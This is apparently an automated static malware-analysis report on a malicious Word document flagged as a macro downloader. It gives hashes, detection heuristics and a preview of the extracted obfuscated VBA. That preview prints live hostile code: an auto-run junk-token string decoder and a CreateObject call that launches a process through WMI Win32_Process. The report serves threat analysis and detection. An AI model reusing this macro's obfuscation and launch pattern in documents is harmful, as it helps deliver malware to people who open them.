Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e1eba613178eab55…

MALICIOUS

Office (OLE)

153.0 KB Created: 2019-09-23 06:17:00 Authoring application: Microsoft Office Word First seen: 2020-04-06
MD5: 56d47781e43cc53702a12bd6634af3d5 SHA-1: 194085d25c89280dbabc1e41299e4b5fc193b6e3 SHA-256: e1eba613178eab5529545ca50542c1bed25d0759eb518c53e45eb8c1e09c4e69
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File: User Execution: Malicious Macro

The sample is a malicious Office document containing obfuscated VBA macros. The 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics indicate that the macros are designed to auto-execute and use CreateObject and Shell functions to run a payload. The ClamAV detection of 'Doc.Downloader.Sagent-7178142-0' further confirms its malicious nature as a downloader.

Heuristics 8

  • ClamAV: Doc.Downloader.Sagent-7178142-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sagent-7178142-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29357 bytes
SHA-256: 098609d902136d4c544612c3f299c48a5d07630da5f8859d62066c872eb86954
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "iP_UasF2, 0, 0, MSForms, TextBox"
Attribute VB_Control = "KzP19Z, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Fic3Oic, 2, 2, MSForms, TextBox"
Attribute VB_Control = "sAKWAi3, 3, 3, MSForms, TextBox"
Attribute VB_Control = "dpiNz7Li, 4, 4, MSForms, TextBox"
Attribute VB_Control = "iXT9cI, 5, 5, MSForms, TextBox"
Attribute VB_Control = "wHbUXGq, 6, 6, MSForms, TextBox"
Attribute VB_Control = "EAmMKG9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "s9dsN64, 8, 8, MSForms, TextBox"
Attribute VB_Control = "XEtisF4, 9, 9, MSForms, TextBox"
Attribute VB_Control = "mNisohpn, 10, 10, MSForms, TextBox"
Attribute VB_Control = "VwmUsJ, 11, 11, MSForms, TextBox"
Attribute VB_Control = "OV5XEB, 12, 12, MSForms, TextBox"
Attribute VB_Control = "RG2GZfYp, 13, 13, MSForms, TextBox"
Attribute VB_Control = "NfTYr68p, 14, 14, MSForms, TextBox"
Attribute VB_Control = "pLFXtJs, 15, 15, MSForms, TextBox"
Attribute VB_Control = "G31fts1, 16, 16, MSForms, TextBox"
Attribute VB_Control = "NtI9sr9, 17, 17, MSForms, TextBox"
Attribute VB_Control = "OcXikq8w, 18, 18, MSForms, TextBox"
Attribute VB_Control = "IJiF_T, 19, 19, MSForms, TextBox"

Attribute VB_Name = "mow_7p4"
Function A38vzGq()
   On Error Resume Next
   Do
      If ObQzzwn2 = q8IS5v Then
         JjUp9Fp = RRI4wnn _
         - Hex(51 + Oct(960 / Round(372))) _
         + 287 - Fix(uQEYVf) - 81 - vcBomQ _
         - uPYmiKIw * Sin(dhMCUf)
         sTbwLzco = Tan(544)
      End If
         w5tBs6 = MprtIRJ _
         * Round(jI4Hjm4Z) / EEjK1A6 / cizSJ8 + (CHLJoH4 _
         / Sin(OFcR2ml) / 921 * Sin(Qqi2tOc1))
      For Each s2tLQO1 In Ub8qYVtz
         k8O7Wn = KZ8sznf5 * Round(vMDBVp0) _
         / AGfAaFz / j6XiqVn + (jnUKfqK5 / Sin(jmk9_Qkw) _
         / 470 * Sin(bmB1ERv))

      Next
Loop Until bsYcpRu = f11j7zG1
j_iIutj = XJEwbR + XsNNa_s(ThisDocument.NfTYr68p + ThisDocument.EAmMKG9) + isF6qlw
   On Error Resume Next
   Do
      If Su3AIKi = qKtdHp Then
         ztDYt7iF = AHzaFwwz _
         - Hex(402 + Oct(799 / Round(831))) _
         + 174 - Fix(TwriHZ_j) - 198 - zZTiFLYA _
         - Q6oddDSZ * Sin(iV1KbMBj)
         zBqqtl = Tan(431)
      End If
         Q5XwJB = GNAEGkc _
         * Round(hjIG5J) / Q3SO0v3O / Ik3Mzm + (qjMNWk _
         / Sin(DCrKauj) / 91 * Sin(IQOJdJ2F))
      For Each tTbvjJ In NiGfsAd
         c2paAwXp = vVZWI2SW * Round(OKBlZTj) _
         / cOrwTSO / tfEFKZ6A + (woZpQC / Sin(rDBrSo_) _
         / 347 * Sin(LhGD5_b))

      Next
Loop Until dMAmqYdU = Hkbwv7

CreateObject(XsNNa_s("yiwawiyiwayiwayiwanmgmyiwatsyiwayiwa:yiwayiwaWiyiwayiwanyiwa3yiwa2yiwa_yiwaProyiwaceyiwassyiwayiwa")).Create j_iIutj, z0a9o4, ArdSEzl, sGjXiKtT
   On Error Resume Next
   Do
      If U_kcW2CV = bZsizMmf Then
         Y8jTzZWS = zsENVMG6 _
         - Hex(781 + Oct(402 / Round(229))) _
         + 544 - Fix(r8J2pAi) - 47 - RjKi_Ob _
         - i8fvwP * Sin(RfIlGrr8)
         ptpz752 = Tan(263)
      End If
         qOE_6w1 = DEL5I2p_ _
         * Round(Mzdh7ros) / Bl5jw5lQ / rRb15_ + (izH8kAAp _
         / Sin(HTQDNW1d) / 125 * Sin(GOQZiFA))
      For Each jo7UvHw In B5jHh5
         wwDF_a = nWjtdiAC * Round(CO_f7akv) _
         / HBsWRR / vSoNFm + (MDmi5d1w / Sin(Ld2njO_i) _
         / 46 * Sin(hMbLWwI0))

      Next
Loop Until HXfKLjI5 = J5hYDpYR

   On Error Resume Next
   Do
      If nipBXKj = QGYX5iO Then
         U6_qAa = LKhpvTa _
         - Hex(34 + Oct(651 / Round(235))) _
         + 922 - Fix(sqJJis_) - 216 - j7wimiw _
         - UiEiPo * Sin(RL_iz0JY)
         W06MAni = Tan(593)
      End If
         lujD3jI = WXbfPhXz _
         * Round(u9nF66WQ) / Zc_fLM / GHCp8Z9U + (lXzMjj2f _
         / Sin(iIfP31Q) / 641 * Sin(wTDUmr8))
      For Each ANHkzb In TS5iprGj
   
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.